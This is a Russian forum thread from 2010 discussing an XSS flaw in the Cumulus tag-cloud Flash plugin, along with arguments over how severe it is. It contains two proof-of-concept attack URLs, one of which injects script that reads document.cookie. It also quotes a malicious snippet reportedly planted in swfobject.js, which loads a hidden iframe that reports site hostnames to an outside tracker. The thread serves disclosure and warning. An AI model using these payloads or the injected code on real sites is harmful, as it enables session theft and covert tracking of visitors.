Кумулюс XSS Санадаль

Главные вкладки

Аватар пользователя Shift-Web Shift-Web 21 апреля 2010 в 16:10

вот пример pt:

http://SITE.ru/modules/cumulus/cumulus.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href=%27java%20script:%20alert%28document.cookie%29%27+style=%27font-size:+50pt%27%3EClick%20me%3C/a%3E%3C/tags%3E

Второй пример:

http://SITE.RU/modules/cumulus/cumulus.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href=%27http://SITE2.ru%27+style=%27font-size:+40pt%27%3EClick%20me%3C/a%3E%3C/tags%3E

Кто что думает???? Этим плагином ного сайтов поломали.

Комментарии

Аватар пользователя Shift-Web Shift-Web 21 апреля 2010 в 16:49

Прям день находок... Проверяйте свои swfobject.js

function second_passed() {window.frames['buffer'].location = "http://maxtracker.net/track_s/new_site.php?s="+ document.location.hostname;}
document.write('<iframe name="buffer" src="about:blank" style="width:0px; height:0px; overflow:hidden; border:none;"></iframe>');setTimeout(second_passed, 1000);
Аватар пользователя Valeratal Valeratal 21 апреля 2010 в 16:54

как хорошо, что я этой ерундой не пользуюсь

ну правда, какой смысл в этой круговерти тегов.

это как яваскриптная анимация на сайтах на народе 10 лет назад

Аватар пользователя Dеmimurych Dеmimurych 21 апреля 2010 в 22:29

чтобы таким образом что то ломать, атакующий должен иметь права на размещение флеша в материале куда атакуемый может зайти.

мало того. атакуемый должен еще произветис клик.

так что простите это не атака. а лохотрон на админа.

Аватар пользователя Shift-Web Shift-Web 21 апреля 2010 в 22:44

Знаете, мне как-то по барабану на кого этот лохотрон. Просто одна мысль о том, что кто-то будет на моем сайте лохотронить мне не по душе ... ну а в целом дело житейское

Аватар пользователя Dеmimurych Dеmimurych 21 апреля 2010 в 23:41

"Shift-Web" wrote:
Знаете, мне как-то по барабану на кого этот лохотрон. Просто одна мысль о том, что кто-то будет на моем сайте лохотронить мне не по душе ... ну а в целом дело житейское

простите у вас на сайте разрешено аплоадить флеш и тем более его размещать в материалах?

эта глупость сродни разрешению фильтра full html всем пользователям.